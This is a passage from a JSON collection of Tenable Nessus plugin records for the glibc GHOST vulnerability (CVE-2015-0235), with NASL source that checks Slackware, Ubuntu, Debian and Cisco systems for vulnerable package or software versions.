pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", 
arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", 
pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", 
pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:22", "description": "According to its self-reported version number, the Cisco TelePresence Video Communication Server is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. 
This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "Cisco TelePresence Video Communication Server GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_video_communication_server_software", "cpe:/a:cisco:telepresence_video_communication_server", "cpe:/h:cisco:telepresence_video_communication_server"], "id": "CISCO_TELEPRESENCE_VCS_CSCUS69558.NASL", "href": "https://www.tenable.com/plugins/nessus/81408", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81408);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69558\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco TelePresence Video Communication Server GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Cisco TelePresence Video 
Communication Server installed\non the remote host is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco TelePresence\nVideo Communication Server is affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69558\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.2 / 8.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_telepresence_video_communication_server_detect.nbin\");\n script_require_keys(\"Cisco/TelePresence_VCS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Video Communication Server\";\nversion = get_kb_item_or_exit(\"Cisco/TelePresence_VCS/Version\");\n\nif (\n version =~ \"^[67]\\.\" ||\n version =~ \"^8\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 8.2 / 8.5' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:02", "description": "It was discovered that a buffer overflow existed in the gethostbyname and gethostbyname2 functions in the GNU C Library. 
An attacker could use this issue to execute arbitrary code or cause an application crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS : eglibc vulnerability (USN-2485-1) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libc6", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2485-1.NASL", "href": "https://www.tenable.com/plugins/nessus/81042", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2485-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81042);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"USN\", value:\"2485-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS : eglibc vulnerability (USN-2485-1) (GHOST)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a buffer overflow existed in the gethostbyname\nand gethostbyname2 functions in the GNU C Library. An attacker could\nuse this issue to execute arbitrary code or cause an application\ncrash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2485-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected libc6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6\", pkgver:\"2.11.1-0ubuntu7.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libc6\", pkgver:\"2.15-0ubuntu10.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libc6\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:50:50", "description": "The remote Cisco device is running a version of Cisco IOS XE software that is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. 
This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that only the following devices are listed as affected :\n\n - Cisco ASR 1000 Series Aggregation Services Routers\n - Cisco ASR 920 Series Aggregation Services Routers\n - Cisco ASR 900 Series Aggregation Services Routers\n - Cisco 4400 Series Integrated Services Routers\n - Cisco 4300 Series Integrated Services Routers\n - Cisco Cloud Services Router 1000V Series", "cvss3": {}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XE GNU C Library (glibc) Buffer Overflow (CSCus69732) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20150128-GHOST-IOSXE_MULTI.NASL", "href": "https://www.tenable.com/plugins/nessus/81594", "sourceData": "#TRUSTED 
510c7fbe9816d2d0c4bd28014c99f98c2c3c652755bdecb3c8e54563635712efb3d2cdb840055785e61f805eb0d2a62f3726ab54ca81843fd44a7249dbab64ae165a06a8fe178a01256963d281cf715987005dba742f8c5127fc8d1c617765362d1681e306ef9ca3e9be42952c5eba6c5bc25eede700ce0c336acbc2f761419f778221dd6c96635e7a364ba379cf36de3e57a2e06c56252b888e3131d7c2f050dc1521aae167c755efef18e71796b19c703d42731d65c20ec6afa77442576511ddac67a8cf6ead79cf1f450d7ada2c8296e1a6d113c5409382850e5e394a7e713e3caf5223887d0c6371c0e103c3c4059d91d1de2d757678daa69e6cf4a64d7f25b3a01a0c8a4ab7a7241f779cd3d135ba7283b688a7e97b3872a8a2f53256e0cad19055959e2a52363b6d2ad74a1cba8d24950ed9f17863e11939481194d5a53c55a270a5676770eb508e44c35e9ba5d7500dc6a662e0a116e565b1113ff80fa8a16ad8aa7fba421df14198cf6801eec0286794e8949c4b6a00697473ba9ed942e06901d51dd2d0df160e4f191ed02aec67acfbd5ccdfe10aee02395a918f9b05f20146876d05b79ae55e8f82728ca61c58747240650e83fa55068ff2403324ec06771b9aa10deff522c2e0c6f3b88cb095206b9332dbeacfefb62827dc6638e7b8da2a2cdb446c205372ea7c41aebe5279403e3641547cc078a07d299074c7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69732\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XE GNU C Library (glibc) Buffer Overflow (CSCus69732) (GHOST)\");\n script_summary(english:\"Checks IOS XE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XE software\nthat is affected by a heap-based buffer overflow vulnerability in the\nGNU C Library (glibc) due to improperly validated user-supplied 
input\nto the __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2() functions. This allows a remote attacker to cause a\nbuffer overflow, resulting in a denial of service condition or the\nexecution of arbitrary code.\n\nNote that only the following devices are listed as affected :\n\n - Cisco ASR 1000 Series Aggregation Services Routers\n - Cisco ASR 920 Series Aggregation Services Routers\n - Cisco ASR 900 Series Aggregation Services Routers\n - Cisco 4400 Series Integrated Services Routers\n - Cisco 4300 Series Integrated Services Routers\n - Cisco Cloud Services Router 1000V Series\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69732\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69732.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Model\");\n\n# Model check\n# Per Bug CSCus69732\nif (\n !(\n \"ASR1k\" >< model ||\n \"ASR920\" >< model ||\n \"ASR900\" >< model ||\n \"ISR4400\" >< model ||\n \"ISR4300\" >< model ||\n \"CSR1000V\" >< model\n )\n) audit(AUDIT_HOST_NOT, \"an affected model\");\n\n# Version check\n# Per Bug CSCus69732\n# - top list (raw)\n# - and bottom list (converted)\nif (\n version == \"3.10.0S\" || #bl\n version == \"3.10.4S\" || #bl\n version == \"3.11.0S\" || #bl\n version == \"3.11.2S\" || #bl\n version == \"3.11.3S\" ||\n version == \"3.12.0S\" || #bl\n version == \"3.12.1S\" || #bl\n version == \"3.13.0S\" || #bl\n version == \"3.13.2S\" ||\n version == \"3.14.S\" ||\n version == \"3.4.7S\" ||\n version == \"3.7.0S\" || #bl\n version == \"3.7.6S\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69732' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:10", "description": "A vulnerability has been fixed in eglibc, Debian's version of the GNU C library :\n\nCVE-2015-0235\n\nQualys discovered that the gethostbyname and gethostbyname2 functions were subject to a buffer overflow if provided with a crafted IP address argument. This could be used by an attacker to execute arbitrary code in processes which called the affected functions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have already been fixed in squeeze LTS via DLA DLA 97-1.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-139-1 : eglibc security update (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eglibc-source", "p-cpe:/a:debian:debian_linux:glibc-doc", "p-cpe:/a:debian:debian_linux:libc-bin", "p-cpe:/a:debian:debian_linux:libc-dev-bin", "p-cpe:/a:debian:debian_linux:libc6", "p-cpe:/a:debian:debian_linux:libc6-amd64", "p-cpe:/a:debian:debian_linux:libc6-dbg", 
"p-cpe:/a:debian:debian_linux:libc6-dev", "p-cpe:/a:debian:debian_linux:libc6-dev-amd64", "p-cpe:/a:debian:debian_linux:libc6-dev-i386", "p-cpe:/a:debian:debian_linux:libc6-i386", "p-cpe:/a:debian:debian_linux:libc6-i686", "p-cpe:/a:debian:debian_linux:libc6-pic", "p-cpe:/a:debian:debian_linux:libc6-prof", "p-cpe:/a:debian:debian_linux:libc6-udeb", "p-cpe:/a:debian:debian_linux:libc6-xen", "p-cpe:/a:debian:debian_linux:libnss-dns-udeb", "p-cpe:/a:debian:debian_linux:libnss-files-udeb", "p-cpe:/a:debian:debian_linux:locales", "p-cpe:/a:debian:debian_linux:locales-all", "p-cpe:/a:debian:debian_linux:nscd", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-139.NASL", "href": "https://www.tenable.com/plugins/nessus/82122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-139-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82122);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"Debian DLA-139-1 : eglibc security update (GHOST)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been fixed in eglibc, Debian's version of the GNU\nC library :\n\nCVE-2015-0235\n\nQualys discovered that the 